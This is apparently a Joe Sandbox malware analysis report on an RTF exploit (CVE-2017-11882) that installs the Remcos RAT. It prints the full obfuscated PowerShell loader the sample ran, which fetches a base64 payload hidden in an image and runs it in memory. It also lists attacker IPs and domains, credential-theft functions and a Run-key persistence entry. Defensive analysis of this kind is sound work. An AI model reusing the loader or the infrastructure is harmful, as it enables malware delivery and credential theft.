tregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtre	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.fdqw/441/57.06.59.32//:ptth' , '1' , 'c:\programdata\' , 'wqq','regasm',''))} }"	Jump to behavior

Source: RegAsm.exe, 0000000C.00000002.865606868.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerChrome - Microsoft Word
Source: RegAsm.exe, 0000000C.00000002.865606868.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: RegAsm.exe, 0000000C.00000002.865606868.000000000061A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.865606868.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, logs.dat.12.dr	Binary or memory string: [Program Manager]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00434BBD cpuid

12_2_00434BBD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	12_2_00452004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	12_2_00452254
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	12_2_004482C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	12_2_0045237D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	12_2_00452484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	12_2_00452551
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	12_2_004487AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	12_2_0040F81F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: IsValidCodePage,GetLocaleInfoW,	12_2_00451C19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	12_2_00451EDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	12_2_00451E91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	12_2_00451F77

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00448817 GetSystemTimeAsFileTime,

12_2_00448817

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0041B55B GetUserNameW,

12_2_0041B55B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00449050 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

12_2_00449050

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.467ae68.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.467ae68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.865606868.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.382499604.0000000004497000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3540, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\notess\logs.dat, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

12_2_0040B960

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		12_2_0040BA7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: \key3.db		12_2_0040BA7E

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-P0AEMX

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.467ae68.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.467ae68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.865606868.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.382499604.0000000004497000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3540, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\notess\logs.dat, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: cmd.exe

12_2_0040569A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	1 Native API	221 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	43 Exploitation for Client Execution	1 DLL Side-Loading	1 Bypass User Account Control	2 Obfuscated Files or Information	211 Input Capture	1 Account Discovery	Remote Desktop Protocol	211 Input Capture	23 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Windows Service	1 Access Token Manipulation	1 Install Root Certificate	2 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	3 Clipboard Data	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	11 Registry Run Keys / Startup Folder	1 Windows Service	1 DLL Side-Loading	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	3 PowerShell	Network Logon Script	322 Process Injection	1 Bypass User Account Control	LSA Secrets	34 System Information Discovery	SSH	Keylogging	1 Remote Access Software	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	1 Masquerading	Cached Domain Credentials	2 Security Software Discovery	VNC	GUI Input Capture	2 Non-Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	213 Application Layer Protocol	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Virtualization/Sandbox Evasion	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	322 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	50%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882
SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	56%	Virustotal		Browse
SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	100%	Avira	HEUR/Rtf.Malformed

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{06BA4240-94DA-46E6-9018-D99C6787D57E}.tmp	100%	Avira	EXP/CVE-2017-11882.Gen

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
sembe.duckdns.org	13%	Virustotal	Browse
geoplugin.net	4%	Virustotal	Browse
uploaddeimagens.com.br	7%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://geoplugin.net/json.gp	100%	URL Reputation	phishing
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	100%	URL Reputation	phishing
https://contoso.com/	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://23.95.60.75	11%	Virustotal		Browse
http://23.95.60.75/xampp/htm/IEnetworkings.htmlj	11%	Virustotal		Browse
sembe.duckdns.org	13%	Virustotal		Browse
https://lesferch.github.io/DesktopPic	0%	Virustotal		Browse
http://23.95.60.75/144/WQDF.txt	15%	Virustotal		Browse
http://23.95.60.75/xampp/htm/IEnetworkings.html	11%	Virustotal		Browse
https://uploaddeimagens.com.br	7%	Virustotal		Browse
https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820	11%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sembe.duckdns.org	194.187.251.115	true	true	13%, Virustotal, Browse	unknown
paste.ee	172.67.187.200	true	false		high
geoplugin.net	178.237.33.50	true	false	4%, Virustotal, Browse	unknown
uploaddeimagens.com.br	172.67.215.45	true	true	7%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://23.95.60.75/xampp/htm/IEnetworkings.html	true	11%, Virustotal, Browse	unknown
http://geoplugin.net/json.gp	true	URL Reputation: phishing	unknown
sembe.duckdns.org	true	13%, Virustotal, Browse	unknown
http://23.95.60.75/144/WQDF.txt	true	15%, Virustotal, Browse	unknown
https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820	true	11%, Virustotal, Browse	unknown
https://paste.ee/d/UZOyJ	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000008.00000002.382499604.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/server1.crl0	wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	false		high
http://23.95.60.75	powershell.exe, 00000008.00000002.403568622.0000000008171000.00000004.00000800.00020000.00000000.sdmp	false	11%, Virustotal, Browse	unknown
http://ocsp.entrust.net03	wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000008.00000002.382499604.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com;	wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	false		low
http://23.95.60.75/xampp/htm/IEnetworkings.htmlj	EQNEDT32.EXE, 00000002.00000002.352128356.0000000003660000.00000004.00000020.00020000.00000000.sdmp	false	11%, Virustotal, Browse	unknown
http://23.95.60.75/xampp/htm/IEnetworkings.htmlrrC:	EQNEDT32.EXE, 00000002.00000002.351462646.000000000030F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 00000008.00000002.382499604.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://analytics.paste.ee	wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.diginotar.nl/cps/pkioverheid0	wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com	wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://lesferch.github.io/DesktopPic	wscript.exe, 00000005.00000003.353928151.0000000002BC9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356453056.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.351462281.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, IEneetworkinglover.vbs.2.dr, IEnetworkings[1].htm.2.dr	false	0%, Virustotal, Browse	unknown
http://crl.microso	powershell.exe, 00000008.00000002.388425734.0000000004E9C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://geoplugin.net/json.gp/C	powershell.exe, 00000008.00000002.382499604.0000000004497000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: phishing	unknown
https://uploaddeimagens.com.br	powershell.exe, 00000008.00000002.382499604.00000000028CA000.00000004.00000800.00020000.00000000.sdmp	true	7%, Virustotal, Browse	unknown
https://contoso.com/	powershell.exe, 00000008.00000002.382499604.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000008.00000002.382499604.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee/	wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp	false		high
https://analytics.paste.ee;	wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	false		low
https://cdnjs.cloudflare.com	wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://paste.ee/d/UZOyJg	wscript.exe, 00000005.00000003.355332766.0000000000890000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357613873.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com;	wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	false		low
http://ocsp.entrust.net0D	wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000006.00000002.490903106.00000000027AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.382499604.0000000002791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.379463159.0000000002791000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.comodo.com/CPS0	wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	false		high
https://secure.gravatar.com	wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://themes.googleusercontent.com	wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.95.60.75	unknown	United States	36352	AS-COLOCROSSINGUS	true
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
104.21.84.67	unknown	United States	13335	CLOUDFLARENETUS	true
172.67.215.45	uploaddeimagens.com.br	United States	13335	CLOUDFLARENETUS	true
194.187.251.115	sembe.duckdns.org	United Kingdom	9009	M247GB	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1429046
Start date and time:	2024-04-20 11:35:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winRTF@16/21@9/5
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 100% Number of executed functions: 79 Number of non-executed functions: 187
Cookbook Comments:	Found application associated with file extension: .rtf Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer Override analysis time to 76720.3851589067 for current running targets taking high CPU consumption Override analysis time to 153440.770317814 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
Execution Graph export aborted for target powershell.exe, PID 3180 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3432 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:36:12	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\WQQ.vbs
02:36:20	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\WQQ.vbs
11:35:55	API Interceptor	55x Sleep call for process: EQNEDT32.EXE modified
